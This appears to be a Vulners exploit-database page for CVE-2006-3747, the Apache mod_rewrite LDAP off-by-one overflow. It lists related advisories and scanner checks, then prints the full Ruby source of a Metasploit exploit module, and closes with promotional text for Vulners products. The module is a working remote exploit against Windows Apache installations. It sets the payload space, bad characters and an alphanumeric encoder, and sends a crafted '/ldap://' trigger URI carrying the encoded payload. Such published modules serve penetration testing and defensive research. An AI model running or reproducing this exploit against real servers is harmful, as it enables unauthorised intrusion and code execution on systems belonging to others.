| Reporter | Title | Published | Views | Family All 131 |
|---|---|---|---|---|
| Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC | 21 Aug 200600:00 | – | zdt | |
| Apache < 1.3.37 mod_rewrite LDAP Protocol URL Handling Overflow | 26 Mar 200800:00 | – | nessus | |
| Apache < 2.0.59 mod_rewrite LDAP Protocol URL Handling Overflow | 26 Mar 200800:00 | – | nessus | |
| Apache < 2.2.3 mod_rewrite LDAP Protocol URL Handling Overflow | 26 Mar 200800:00 | – | nessus | |
| Debian DSA-1131-1 : apache - buffer overflow | 14 Oct 200600:00 | – | nessus | |
| Debian DSA-1132-1 : apache2 - buffer overflow | 14 Oct 200600:00 | – | nessus | |
| Fedora Core 4 : httpd-2.0.54-10.4 (2006-862) | 17 Jan 200700:00 | – | nessus | |
| Fedora Core 5 : httpd-2.2.2-1.2 (2006-863) | 17 Jan 200700:00 | – | nessus | |
| FreeBSD : apache -- mod_rewrite buffer overflow vulnerability (dc8c08c7-1e7c-11db-88cf-000c6ec775d9) | 29 Jul 200600:00 | – | nessus | |
| GLSA-200608-01 : Apache: Off-by-one flaw in mod_rewrite | 4 Aug 200600:00 | – | nessus |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Module mod_rewrite LDAP Protocol Buffer Overflow',
'Description' => %q{
This module exploits the mod_rewrite LDAP protocol scheme handling
flaw discovered by Mark Dowd, which produces an off-by-one overflow.
Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
This module requires REWRITEPATH to be set accurately. In addition,
the target must have 'RewriteEngine on' configured, with a specific
'RewriteRule' condition enabled to allow for exploitation.
The flaw affects multiple platforms, however this module currently
only supports Windows based installations.
},
'Author' => 'aushack',
'References' =>
[
[ 'CVE', '2006-3747' ],
[ 'OSVDB', '27588' ],
[ 'BID', '19204' ],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
[ 'EDB', '3680' ],
[ 'EDB', '3996' ],
[ 'EDB', '2237' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'AllowWin32SEH' => true
},
'Privileged' => true,
'Platform' => ['win'],
'Payload' =>
{
'Space' => 636,
'BadChars' => "\x00\x0a\x0d\x20",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'StackAdjustment' => -3500,
'DisableNops' => 'True',
},
'Targets' =>
[
[ 'Automatic', {} ], # aushack tested OK 20090310 win32
],
'DisclosureDate' => '2006-07-28',
'DefaultTarget' => 0))
register_options(
[
OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
])
end
def check
res = send_request_raw({
'uri' => '/',
'version' => '1.1',
}, 2)
if (res.to_s =~ /Apache/) # This could be smarter.
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
# On Linux Apache, it is possible to overwrite EIP by
# sending ldap://<buf> ... TODO aushack
trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'
print_status("Sending payload.")
send_request_raw({
'uri' => normalize_uri(datastore['REWRITEPATH']) + trigger + payload.encoded,
'version' => '1.0',
}, 2)
handler
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation